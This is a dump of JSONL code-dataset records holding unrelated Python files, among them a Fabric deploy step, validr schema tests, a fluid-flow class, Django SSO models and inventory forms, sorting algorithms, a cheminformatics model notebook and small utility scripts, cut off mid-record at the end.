重置软链接:\n with cd(_REMOTE_BASE_DIR):\n run(\"rm -rf www\")\n run(\"ln -s %s www\" % newdir)\n # 重启Python服务和nginx服务器:\n with settings(warn_only=True):\n run(\"supervisorctl stop kaguyahime\")\n run(\"supervisorctl start kaguyahime\")\n run(\"nginx -s reload\")\n","sub_path":"fabfile.py","file_name":"fabfile.py","file_ext":"py","file_size_in_byte":1740,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"385073335","text":"import pytest\nfrom validr import Invalid, SchemaError, SchemaParser\n\n\n@pytest.mark.parametrize('schema,value', [\n (\n {'$self@user_name': 'User'},\n {'name': 'kk'}\n ),\n (\n {'$self@user_name@user_age': 'User'},\n {'name': 'kk', 'age': 1}\n ),\n (\n {'$self@user_name': 'User', 'userid?int': 'ID'},\n {'name': 'kk', 'userid': 0}\n )\n])\ndef test_basic(schema, value):\n sp = SchemaParser(shared={\n 'user_name': {'name?str': 'name'},\n 'user_age': {'age?int': 'age'},\n })\n f = sp.parse(schema)\n assert f(value) == value\n\n\n@pytest.mark.parametrize('schema', [\n {'$self@user_name&optional': 'User'},\n {'$self@user_name&optional': 'User', 'userid?int': 'ID'},\n {'$self@user_name@user_age&optional': 'User'},\n])\ndef test_optional(schema):\n sp = SchemaParser(shared={\n 'user_name': {'name?str': 'name'},\n 'user_age': {'age?int': 'age'},\n })\n f = sp.parse(schema)\n assert f(None) is None\n\n\ndef test_shared_not_found():\n sp = SchemaParser(shared={'user': {'userid?int': 'userid'}})\n with pytest.raises(SchemaError):\n sp.parse({'$self@unknown@user': 'desc'})\n\n\ndef test_merge_non_dict_value_error():\n sp = SchemaParser(shared={\n 'a': 'int',\n 'b': {'k?str': 'v'}\n })\n with pytest.raises(SchemaError) as exinfo:\n sp.parse({'key': {'$self@a@b': 'invalid merges'}})\n assert exinfo.value.position == 'key'\n assert '@a' in exinfo.value.message\n\n\ndef test_required():\n sp = SchemaParser(shared={'a': {'x?int': 'x'}, 'b': {'y?int': 'y'}})\n f = sp.parse({'$self@a@b': 'required'})\n assert f({'x': 1, 'y': 2}) == {'x': 1, 'y': 2}\n with pytest.raises(Invalid) as exinfo:\n f(None)\n assert 'required' in exinfo.value.message\n\n\n@pytest.mark.parametrize('value,expect', [\n (None, ''),\n ({'name': 'kk'}, 'age'),\n ({'age': 1}, 'name'),\n ({'name': 'kk', 'age': 'xxx'}, 'age'),\n])\ndef test_error_position(value, expect):\n sp = SchemaParser(shared={\n 'user_name': {'name?str': 'name'},\n 'user_age': {'age?int': 'age'},\n })\n f = sp.parse({'$self@user_name@user_age': 'User'})\n with pytest.raises(Invalid) as exinfo:\n f(value)\n assert exinfo.value.position == expect\n","sub_path":"tests/test_merge.py","file_name":"test_merge.py","file_ext":"py","file_size_in_byte":2263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"645221279","text":"import numpy as np\n\n\n\"\"\"Eventually, this module should be able to set up a 3D transient fluid flow problem for a rectangular\nduct for the solver inputs. Currently, only a 2D advection-diffusion problem is to be set up to get\nthings rolling. The initial conditions, boundary conditions, and fluid properties will be established here\"\"\"\n\n\nclass FiniteVolume(object):\n \"\"\"A finite volume is a defined space in which energy and mass can enter and leave via several processes including\n diffusion and advection. In this class, the finite volume is a quadrahedron.\n\n Attributes\n __________\n\n size : dx, dy, and dz as length, height, and depth of the quadrahedron in [m]\n time_step : dt in [s]\n position : x, y, and z location in [m]\n boundary : 'top', 'bottom', 'left', 'right', 'front', 'back' of domain where up to 3 may be chosen\n velocity_estimated : u, v, and w velocities in [m/s]\n velocity : u, v, and w velocities in [m/s]\n pressure_estimated : p pressure in [Pa]\n pressure : p pressure in [Pa]\n temperature : temp\n density : fluid density in [kg/m^3]\n viscosity : in [kg/(m*s)]\n conductivity : fluid thermal conductivity [W/(m*K)]\n \"\"\"\n\n def __init__(self, size, time_step, position, boundary, velocity_estimated, velocity, pressure_estimated, pressure,\n temperature, density, viscosity, conductivity):\n\n self.size = size\n self.time_step = time_step\n self.position = position\n self.boundary = boundary\n self.velocity_estimated = velocity_estimated\n self.velocity = velocity\n self.pressure_estimated = pressure_estimated\n self.pressure = pressure\n self.temperature = temperature\n self.density = density\n self.viscosity = viscosity\n self.conductivity = conductivity\n\n def get_momentum_coefficients(self):\n \"\"\"Calculates the time coefficient for all the momentum equations at the current time step and the a\n coefficients in the x, y, and z directions. The coefficients are dependent on the reference, being the relative\n location of an adjacent node. Currently, the generalized convection-diffusion scheme is used from Chapter 8 of\n \"Computational Methods for Heat and Mass Transfer\" by Pradip Majumdar with the option for adding 5 different\n approximation schemes. The Hybrid scheme is selected for now.\"\"\"\n\n a_m = self.density*self.size['dx']*self.size['dy']*self.size['dz']/self.time_step\n\n pe_i = self.density*self.velocity['u']*self.size['dx']/self.viscosity\n a_pe_i = np.max(np.array([0, 1 - (np.abs(pe_i)/2)]))\n a_i_base = (self.viscosity / self.size['dx'])*a_pe_i\n a_i_sup = self.density*self.velocity['u']\n\n pe_j = self.density*self.velocity['v']*self.size['dy']/self.viscosity\n a_pe_j = np.max(np.array([0, 1 - (np.abs(pe_j)/2)]))\n a_j_base = (self.viscosity / self.size['dy'])*a_pe_j\n a_j_sup = self.density*self.velocity['v']\n\n pe_k = self.density*self.velocity['w']*self.size['dz']/self.viscosity\n a_pe_k = np.max(np.array([0, 1 - (np.abs(pe_k)/2)]))\n a_k_base = (self.viscosity / self.size['dz'])*a_pe_k\n a_k_sup = self.density*self.velocity['w']\n\n return a_m, [a_i_base, a_j_base, a_k_base], [a_i_sup, a_j_sup, a_k_sup]\n\n def set_boundary_values(self, p_inlet, p_outlet):\n \"\"\"Depending on the boundary of the finite volume, the boundary conditions for fluid flow will either be a known\n pressure or a velocity of zero in all directions\"\"\"\n\n if 'top' or 'bottom' or 'front' or 'back' in self.boundary:\n self.velocity = {'u': 0, 'v': 0, 'w': 0}\n\n if 'left' in self.boundary:\n self.pressure = p_inlet\n\n if 'right' in self.boundary:\n self.pressure = p_outlet\n\n\ndef initial_conditions(velocity, grid):\n \"\"\"Returns the velocity distribution as a numpy array at t = 0\n For 2D, the velocity input could be an integer or float if the velocity is the same along the\n entire channel. It could also be a function of x and y in the channel\"\"\"\n\n em1 = 'Initial velocity should be positive'\n em2 = 'Velocity must be scalar or function of x and y coordinates and grid must be numpy array'\n\n try:\n v = velocity(grid)\n if np.amin(v) < 0:\n return em1\n else:\n return v\n except TypeError:\n try:\n v = velocity*np.ones(np.shape(grid))\n if np.amin(v) < 0:\n return em1\n else:\n return v\n except TypeError:\n return em2\n","sub_path":"flowdist/fluidmechanics.py","file_name":"fluidmechanics.py","file_ext":"py","file_size_in_byte":4621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"29084984","text":"#!/usr/bin/env python\n# -*- coding: ascii -*-\n###############################################################################\n# Copyright (c) 2010, Penny Arcade, Inc. / Erik Karulf(erik@penny-arcade.com) #\n# #\n# Permission to use, copy, modify, and/or distribute this software for any #\n# purpose with or without fee is hereby granted, provided that the above #\n# copyright notice and this permission notice appear in all copies. #\n# #\n# THE SOFTWARE IS PROVIDED \"AS IS\" AND THE AUTHOR DISCLAIMS ALL WARRANTIES #\n# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF #\n# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR #\n# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES #\n# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN #\n# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF #\n# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. #\n###############################################################################\n\nimport datetime\n\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.utils.translation import ugettext_lazy as _\n\nclass GlobalSessionManager(models.Manager):\n def active(self):\n return self.get_query_set().filter(expire_date__gt=datetime.datetime.utcnow())\n\nclass GlobalSession(models.Model):\n \"\"\"\n Global Session Table\n\n Read-only except to sso-server\n \"\"\"\n key = models.CharField(_('session key'), max_length=44, primary_key=True)\n user = models.ForeignKey(User, verbose_name=_('user'))\n expire_date = models.DateTimeField(_('expire date'), help_text=\"expiration timestamp (UTC)\")\n objects = GlobalSessionManager()\n \n class Meta:\n db_table = 'sso_session'\n verbose_name = _('global session')\n verbose_name_plural = _('global sessions')\n\nimport pa.sso.signals","sub_path":"src/pa/sso/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2101,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"90130831","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n# Author:hua\nimport numpy as np\nfrom scipy.stats import kstest, norm\nimport matplotlib.pyplot as plt\nls = [1,2,3,4,5,6,7,6,5,4,3,2,1]\nls = np.array(ls)\nls.sort()\nn = len(ls)\n\n# x中第一个为统计量,第二个为P值\nx=kstest(ls, 'norm')\nprint(x)\ny_list = [float(i) / n for i in range(1, n + 1)] # 求观察累积概率y_list\n\nx_list = [norm.ppf(ele) for ele in y_list] # 用累积概率求分位数值x_list\n\nplt.plot(x_list, y_list)\n\nplt.savefig(\"QQ正态分布.png\")","sub_path":"正态性检验/正态分布检验QQ图.py","file_name":"正态分布检验QQ图.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"647341561","text":"arr = [64, 25, 12, 22, 11]\n\nfor i in range(0, len(arr)):\n index = i\n\n for j in range(i+1, len(arr)):\n if arr[index] > arr[j]:\n index = j\n\n arr[i], arr[index] = arr[index], arr[i]\n\nprint('Selection Sort')\nprint(arr)\nprint('')\n\narr = [64, 25, 12, 22, 11]\n\nfor i in range(0, len(arr)-1):\n for j in range(0, len(arr)-i-1):\n if arr[j] > arr[j+1]:\n arr[j], arr[j+1] = arr[j+1], arr[j]\n\nprint('Bubble Sort')\nprint(arr)\nprint('')\n\narr = [64, 25, 12, 22, 11]\n\nfor i in range(1, len(arr)):\n key = arr[i]\n j = i -1\n\n while(j >= 0 and key < arr[j]):\n arr[j+1] = arr[j]\n j -= 1\n\n arr[j+1] = key\n\nprint('Insertion Sort')\nprint(arr)\nprint('')","sub_path":"basicSorts.py","file_name":"basicSorts.py","file_ext":"py","file_size_in_byte":701,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"619007108","text":"#get the count of each genre. remeber, movies can have multiple genres\n#is there a primary genre? it seems like they're just listed alphabetically\nimport csv\n\nf = open('/Users/martinvazquez/Spring2020/DSC_341/project/dataSets/movieDBGrossInclMV.csv')\nlines = f.readlines()\nf.close()\n\nlst = []\nd = {}\n\n#get a gigantic list of every single word thats used in genres (even if its duplicated)\nfor line in lines[1:]: #removes the 1st row where all of the 'values' are just the header\n line = line.strip().strip('\"')\n line = line.split(',')\n line = line[1:]\n gross = line[9]\n print(gross)\n genres = line[10].strip('\"')\n genres = genres.split('|')\n #print(genres)\n lst.extend(genres)\n\n\nfor i in lst: #remove the duplicates, and do a count\n if i not in d:\n d[i] = 1\n else:\n d[i] +=1\n\n'''with open('genres.csv', mode='w') as csv_file:\n fieldnames = ['genre', 'count']\n writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n writer.writeheader()\n for key in d:\n writer.writerow({'genre':key, 'count':d[key]})'''\n \n","sub_path":"333 Code/genre.py","file_name":"genre.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"353730259","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# ## Mordred and Morgan \n\n# In[2]:\n\n\n# Computing mordred and morgan features and building a model from these features\n\n\n# In[22]:\n\n\nget_ipython().run_line_magic('matplotlib', 'inline')\n\nimport Utils as model_helpers\nimport numpy as np\nimport pandas as pd\nfrom sklearn.preprocessing import StandardScaler\n\n\n# Computing Features\n\n# In[4]:\n\n\nhalf_enantiomer_data = pd.read_csv(\"half_enantiomer_data.csv\")\n\n\n# In[5]:\n\n\n# Remove line separaters\nhalf_enantiomer_data[\"SMILES String\"] = half_enantiomer_data[\"SMILES String\"].apply(lambda x : x.replace(\"\\\\n\", \"\") and x.replace(\"\\\\r\", \"\"))\nhalf_enantiomer_data[\"SMILES String\"] = half_enantiomer_data[\"SMILES String\"].apply(lambda x : x.replace(\"\\\\n\", \"\"))\n\n\n# In[6]:\n\n\n# Calculate the mordred features\nmordred_data = model_helpers.calculate_features(half_enantiomer_data, \"mordred\")\n\n\n# In[7]:\n\n\n# Calculate the morgan features\nmorgan_data = model_helpers.calculate_features(half_enantiomer_data, \"morgan\")\n\n\n# In[8]:\n\n\n#zero_var_cols = [mordred_data[col] for col in mordred_data.iloc[:,11:] if (mordred_data[col].var() > 0) == True]\n#mordred_data.drop(columns)\n\n\n# In[9]:\n\n\n# Dataframe with molecules that have mordred and morgan features computed\ncommon_index = mordred_data.index.intersection(morgan_data.index)\nmordred_data = mordred_data.loc[common_index]\nmorgan_data = morgan_data.loc[common_index]\n\n\n# In[10]:\n\n\n# Reset index\nmordred_data.set_index('Molecule Name').head().iloc[:, 10:];\nmorgan_data.set_index('Molecule Name').head().iloc[:, 10:];\n\n\n# In[11]:\n\n\n# Data frame that has both the mordred and morgan features\nboth = mordred_data.join(morgan_data.iloc[:,10:], how=\"inner\", rsuffix='morg_')\nboth.head()\n\n\n# In[12]:\n\n\n#Need to drop var columns\nprint(both.var().max())\nprint(both.var().min())\n\n\n# In[13]:\n\n\n# Gets all Mordred or Mogan features that have numeric values and not Null values\n# Joins the final mordred and morgan features \nfinite_mordred = model_helpers.finite_features(mordred_data)\nfinite_morgan = model_helpers.finite_features(morgan_data)\nboth_features = finite_mordred | finite_morgan\n\n\n# Model\n\n# In[21]:\n\n\n# Illustrate the magnitude differences across enantiomeric pairs in the dataset\nmodel_helpers.fold_difference_of_enantiomers(half_enantiomer_data)\n\n\n# In[15]:\n\n\n# Gets the appropriate parameter values for mordred model\n# Gets the valid features (not null values) from feature data frame and the log_abs values from the feature dataframe\nX_morded = mordred_data[finite_mordred]\ny = mordred_data['log_abs']\nX_morded = X_morded[y < 10]\ny_mordred = y[y < 10]\nXn_mordred = pd.DataFrame(StandardScaler().fit_transform(X_morded), index=X_morded.index, columns=X_morded.columns)\n\n\n# In[16]:\n\n\n# Gets the appropriate parameter values for Morgan model\n# Gets the valid features (not null values) from feature data frame and the log_abs values from the feature dataframe\nx_morgan = morgan_data[finite_morgan]\ny_morgan = morgan_data[\"log_abs\"]\nx_morgan = x_morgan[y_morgan < 10]\ny_morgan = y_morgan[y_morgan < 10]\nXn_morgan = pd.DataFrame(StandardScaler().fit_transform(x_morgan), index=x_morgan.index, columns=x_morgan.columns)\n\n\n# In[25]:\n\n\n# Model for Morgan data\nmodel_helpers.create_model(Xn_morgan, y_morgan)\n\n\n# In[26]:\n\n\nmodel_helpers.cross_val(Xn_morgan, y_morgan)\n\n\n# In[24]:\n\n\n# Model for Mordred data\nmodel_helpers.create_model(Xn_mordred, y_mordred)\n\n\n# In[23]:\n\n\nmodel_helpers.cross_val(Xn_mordred, y_mordred)\n\n","sub_path":"docs/_build/jupyter_execute/MordredAndMorgan.py","file_name":"MordredAndMorgan.py","file_ext":"py","file_size_in_byte":3435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"2223339","text":"import os, sys\n\nfiles = [\n \"bgruven/bufrgruven/stations/gfs3_bufrstations.txt\",\n \"bgruven/bufrgruven/stations/nam_bufrstations.txt\",\n \"bgruven/bufrgruven/stations/rap_bufrstations.txt\",\n]\n\nd = {}\nfor f in files:\n model = f.split(\"/\")[-1].split(\"_\")[0]\n d[model] = {}\n\n fh = open(f, \"r\")\n lines = fh.readlines()\n fh.close()\n\n for line in lines:\n # 000001 69.580 -140.180 YAJ 11 0 KOMAKUK YT 19 0 MAGS 9-95\n s = line.split()\n sNum = s[0]\n lat = s[1]\n lon = s[2]\n site = s[3].lower()\n d[model][site] = {\"sNum\": sNum, \"lat\": lat, \"lon\": lon}\n\n# echo \"\".$lat[$i].\",\".$lon[$i].\",\".$sites[$i].\",\".$ewrf_sites[$i].\",\".$gfs.\",\".$nam.\",\".$ruc.\",\".$sref.\"\\n\";\n\nl = []\nsites = []\newrf = \"---\"\nsref = \"---\"\nfor site in d[\"gfs3\"]:\n nam = \"---\"\n rap = \"---\"\n if site in d[\"nam\"].keys():\n nam = site\n if site in d[\"rap\"].keys():\n rap = site\n s = (\n d[\"gfs3\"][site][\"lat\"]\n + \",\"\n + d[\"gfs3\"][site][\"lon\"]\n + \",\"\n + site\n + \",---,\"\n + site\n + \",\"\n + nam\n + \",\"\n + rap\n + \",---\"\n )\n l.append(s)\n sites.append(site)\n\nfor site in d[\"nam\"]:\n if site in sites:\n continue\n rap = \"---\"\n if site in d[\"rap\"].keys():\n rap = site\n s = (\n d[\"nam\"][site][\"lat\"]\n + \",\"\n + d[\"nam\"][site][\"lon\"]\n + \",\"\n + site\n + \",---,---,\"\n + site\n + \",\"\n + rap\n + \",---\"\n )\n l.append(s)\n sites.append(site)\n\nfor site in d[\"rap\"]:\n if site in sites:\n continue\n s = (\n d[\"rap\"][site][\"lat\"]\n + \",\"\n + d[\"rap\"][site][\"lon\"]\n + \",\"\n + site\n + \",---,---,---,\"\n + site\n + \",---\"\n )\n l.append(s)\n sites.append(site)\n\nfh = open(\"global_stations_new.txt\", \"w\")\nfh.write(\"\\n\".join(l))\nfh.close()\n","sub_path":"scripts/makeGlobalSiteListing.py","file_name":"makeGlobalSiteListing.py","file_ext":"py","file_size_in_byte":1965,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"49055055","text":"import biom_features as bf\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport os\nimport numpy as np\nimport cv2 as cv\nimport time\n\nPATH = os.getcwd()\n#methods = [\"Histogram\", \"DFT\", \"DCT\", \"Scale\", \"Gradient\"]\n\n\ndef feat_demonst(m, n, p, BIN, w, s):\n\n fig, ((ax1, ax2, ax3), (ax4, ax5, ax6)) = plt.subplots(ncols=3, nrows=2, figsize=(10, 8))\n images = [PATH + \"/ATT/\" + str(i) + \"_1.png\" for i in range(1, 41)]\n\n for image in images:\n img = np.float32(cv.imread(image, 0))\n scale_feat = bf.Scale(img, m, n) # return matrix of resized image\n dtf_feat = bf.DFT(img, p) # return matrix p*p? mot centred\n dct_feat = bf.DCT(img, p) # also\n hist_feat = bf.histogram(img, BIN) # list of distributon, hist and normallised hist\n grad_feat = bf.gradient(img, w, s)\n\n\n ax1.imshow(img, cmap='gray')\n ax1.set_title(\"Origin image (112*92)\")\n\n # resized imge\n ax2.imshow(scale_feat, cmap='gray')\n ax2.set_title(\"Scale, m=18, n=15\")\n\n dft_centred = np.fft.fftshift(dtf_feat)\n dft_centred = np.log(np.abs(dft_centred))\n ax3.cla()\n ax3.imshow(abs(dft_centred), cmap='gray')\n ax3.set_title(\"DFT, p=20\")\n\n # plt.subplot(234)\n ax4.imshow(dct_feat, cmap='gray')\n ax4.set_title(\"DCT, p=20\")\n\n # plt.subplot(235)\n b = hist_feat[1]\n edges = [i * BIN for i in range(1, len(b) + 1)]\n ax5.cla()\n ax5.bar(edges, b, width=int(BIN / 2))\n\n # plt.subplot(236)\n x_grad = range(len(grad_feat))\n ax6.cla()\n ax6.plot(x_grad, grad_feat)\n\n ax6.grid(True)\n\n # fig.canvas.draw()\n # fig.canvas.flush_events()\n\n plt.ion()\n plt.show()\n plt.pause(0.05)\n\n plt.close()\n","sub_path":"demonstrate_feature.py","file_name":"demonstrate_feature.py","file_ext":"py","file_size_in_byte":1785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"635156536","text":"# coding=utf-8\n# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom msrest.serialization import Model\n\n\nclass ServerDnsAliasAcquisition(Model):\n \"\"\"A server DNS alias acquisition request.\n\n :param old_server_dns_alias_id: The id of the server alias that will be\n acquired to point to this server instead.\n :type old_server_dns_alias_id: str\n \"\"\"\n\n _attribute_map = {\n 'old_server_dns_alias_id': {'key': 'oldServerDnsAliasId', 'type': 'str'},\n }\n\n def __init__(self, **kwargs):\n super(ServerDnsAliasAcquisition, self).__init__(**kwargs)\n self.old_server_dns_alias_id = kwargs.get('old_server_dns_alias_id', None)\n","sub_path":"src/db-up/azext_db_up/vendored_sdks/azure_mgmt_sql/sql/models/server_dns_alias_acquisition.py","file_name":"server_dns_alias_acquisition.py","file_ext":"py","file_size_in_byte":1069,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"79862208","text":"def slownie(liczba):\n nazwy = ['zero', 'jeden', 'dwa', 'trzy', 'cztery',\n 'pięć', 'sześć', 'siedem', 'osiem', 'dziewięć']\n x = str(liczba)\n cyfry = []\n for elem in x:\n cyfry.append(nazwy[int(elem)])\n\n return ','.join(cyfry)\n\n\nprint(slownie(2542))\n","sub_path":"02-ControlStructures/31-40/tempCodeRunnerFile.py","file_name":"tempCodeRunnerFile.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"257139914","text":"# -*- coding:utf-8 -*-\n# python main.py \"\"\nimport gspread\nimport sys\nfrom datas_get import sheet_get\nfrom data_parse import datas_parse\n\n#debug flag\ndebug = 0\n\ndef main(argvs):\n\tname = argvs[1]\n\tdate = argvs[2]\n\n\twsheet = sheet_get.worksheet_acquisition(0)\n\n\t# Sheetから列情報をlistで取得\n\tname_col_record, name_col_len = sheet_get.get_col(wsheet,2)\n\n\tif debug == 1:\n\t\tprint('[*] name_col_record:{}'.format(name_col_record))\n\n\ttarget_row_num = datas_parse.search_name(name_col_record,argvs[1],name_col_len) + 1\n\n\tif debug == 1:\n\t\tprint('[*] target_row_num:{}'.format(target_row_num))\n\n\t# Sheetから行情報をlistで取得\n\ttarget_row_record, target_row_len = sheet_get.get_row(wsheet,target_row_num)\n\thead_row_record, head_row_len = sheet_get.get_row(wsheet,1)\n\n\tif debug == 1:\n\t\tprint('[*] head_row_record:{}'.format(head_row_record))\n\t\tprint('[*] target_row_record :{}'.format(target_row_record))\n\n\t# hiduke wo list ka?\n\ttime = datas_parse.time_get(date, head_row_len, head_row_record, wsheet, target_row_num-1)\n\tif(time[0]==0):\n\t\tprint('[-]this day is bit Mtg')\n\t\tquit()\n\n\tif debug == 1:\n\t\tprint('[*] st:{}'.format(time[0]))\n\t\tprint('[*] en:{}'.format(time[1]))\n\t\tprint('[*] rest:{}'.format(time[2]))\n\n\n\n\n\nif __name__ == '__main__':\n\targvs = sys.argv\n\tmain(argvs)","sub_path":"OLD/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1284,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"148466580","text":"import wx\n\nclass MyApp(wx.App):\n def OnInit(self):\n f = wx.Frame(None, title=\"Hello World\")\n self.tc = wx.TextCtrl(f, style=wx.TE_MULTILINE|wx.HSCROLL)\n f.Show()\n return True\n \n def MacOpenFile(self, filename):\n # Code to load filename goes here. We'll just print the names.\n self.tc.AppendText(\"You requested to open: \\\"%s\\\"\\n\" % filename)\n\napp = MyApp()\napp.MainLoop()\n\n","sub_path":"tags/wxPy-2.9.3.1/wxPython/sandbox/test_appleevents.py","file_name":"test_appleevents.py","file_ext":"py","file_size_in_byte":424,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"199400962","text":"from django import forms\nfrom .models import Search, Employee, Computer, WirelessDevice, IPPhone, Laptop, Printer, BarcodeScanner, BarcodeScannerCradle, Scanner, BiometricScanner\nfrom django.contrib.auth.models import User\nfrom django.contrib.admin.widgets import AdminDateWidget\nfrom functools import partial\n\nclass EmployeeForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Employee\n\t\tfields = ['last_name', 'first_name', 'location', 'department', 'employee_id', 'email',]\n\t\tlabels = {'last_name': 'Last Name (required)', 'first_name': 'First Name (required)', 'employee_id': 'Employee ID', 'email': 'E-mail'}\n\nclass LoginForm(forms.ModelForm):\n\tpassword = forms.CharField(widget = forms.PasswordInput())\n\t#Hide help text\n\tdef __init__(self, *args, **kwargs):\n\t\tsuper(LoginForm, self).__init__(*args, **kwargs)\n\t\tfor field in ['username', 'password']:\n\t\t\tself.fields[field].help_text = None\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ['username', 'password',]\n\t\t\nclass SearchForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Search\n\t\tfields = [\"search_term\",]\n\t\tlabels = {'search_term': 'Enter any string to be searched',}\n\t\t\nclass ComputerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Computer\n\t\tfields = ['pc_manufacturer', 'pc_model', 'pc_host_name', 'pc_service_tag', 'pc_asset_tag', 'pc_owner',]\n\t\tlabels = {'pc_manufacturer': 'PC Manufacturer', 'pc_model': 'PC Model', 'pc_host_name': 'PC Host Name', 'pc_service_tag': 'PC Serial Num/Service Tag', 'pc_asset_tag': 'PC Asset Tag', 'pc_owner': 'PC Owner',}\n\nclass WirelessDeviceForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = WirelessDevice\n\t\tfields = ['wd_type', 'wd_manufacturer', 'wd_model', 'wd_number', 'wd_serial_number', 'wd_meid', 'wd_carrier', 'wd_asset_tag', 'wd_date_deployed', 'wd_date_returned', ]\n\t\tlabels = {'wd_type': 'WD Type', 'wd_manufacturer': 'WD Manufacturer', 'wd_model': 'WD Model', 'wd_number': 'WD Number', 'wd_serial_number': 'WD Serial Number', 'wd_meid': 'MEID', 'wd_carrier': 'WD Carrier', 'wd_asset_tag': 'WD Asset Tag', 'wd_date_deployed': 'WD Deploy Date', 'wd_date_returned': 'WD Return Date',}\t\n\t\t#Add widget for jQuery datepicker\n\t\twidgets = {\n\t\t\t'wd_date_deployed': forms.DateInput(attrs = {'class': 'datepicker'}),\n 'wd_date_returned': forms.DateInput(attrs = {'class': 'datepicker'}),\n\t\t}\n\nclass IPPhoneForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = IPPhone\n\t\tfields = ['phone_manufacturer', 'phone_model','phone_number', 'phone_serial_number', 'phone_mac', 'phone_asset_tag', ]\n\t\tlabels = {'phone_manufacturer': 'Phone Manufacturer', 'phone_model': 'Phone Model','phone_number': 'Phone Number', 'phone_serial_number': 'Phone Serial Number', 'phone_mac': 'Phone MAC', 'phone_asset_tag': 'Phone Asset Tag',}\n\t\t\nclass LaptopForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Laptop\n\t\tfields = ['laptop_manufacturer', 'laptop_model', 'laptop_host_name', 'laptop_service_tag', 'laptop_asset_tag', 'laptop_owner', ]\n\t\tlabels = {'laptop_manufacturer': 'Laptop Manufacturer', 'laptop_model': 'Laptop Model', 'laptop_host_name': 'Laptop Host Name', 'laptop_service_tag': 'Laptop Service Tag', 'laptop_asset_tag': 'Laptop Asset Tag', 'laptop_owner': 'Laptop Owner', }\n\nclass PrinterForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Printer\n\t\tfields = ['printer_manufacturer', 'printer_model', 'printer_serial_number', 'printer_asset_tag', 'printer_owner', ]\n\t\tlabels = {'printer_manufacturer': 'Printer Manufacturer', 'printer_model': 'Printer Model', 'printer_serial_number': 'Printer Serial Number', 'printer_asset_tag': 'Printer Asset Tag', 'printer_owner': 'Printer Owner',}\n\nclass BarcodeScannerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BarcodeScanner\n\t\tfields = ['bs_manufacturer', 'bs_model', 'bs_serial_number', 'bs_asset_tag', ]\n\t\tlabels = {'bs_manufacturer': 'BS Manufacturer', 'bs_model': 'BS Model', 'bs_serial_number': 'BS Serial Number', 'bs_asset_tag': 'BS Asset Tag', }\n\t\nclass BarcodeScannerCradleForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BarcodeScannerCradle\n\t\tfields = ['bsc_manufacturer', 'bsc_model', 'bsc_serial_number', 'bsc_asset_tag', ]\n\t\tlabels = {'bsc_manufacturer': 'Cradle Manufacturer', 'bsc_model': 'Cradle Model', 'bsc_serial_number': 'Cradle Serial Number', 'bsc_asset_tag': 'Cradle Asset Tag', }\n\nclass ScannerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = Scanner\n\t\tfields = ['scanner_manufacturer', 'scanner_model', 'scanner_serial_number', 'scanner_asset_tag', ]\n\t\tlabels = {'scanner_manufacturer': 'Scanner Manufacturer', 'scanner_model': 'Scanner Model', 'scanner_serial_number': 'Scanner Serial Number', 'scanner_asset_tag': 'Scanner Asset Tag', }\n\t\t\nclass BiometricScannerForm(forms.ModelForm):\n\tclass Meta:\n\t\tmodel = BiometricScanner\n\t\tfields = ['bis_manufacturer', 'bis_model', 'bis_serial_number', 'bis_asset_tag', ]\n\t\tlabels = {'bis_manufacturer': 'Biometric Scanner Manufacturer', 'bis_model': 'Biometric Scanner Model', 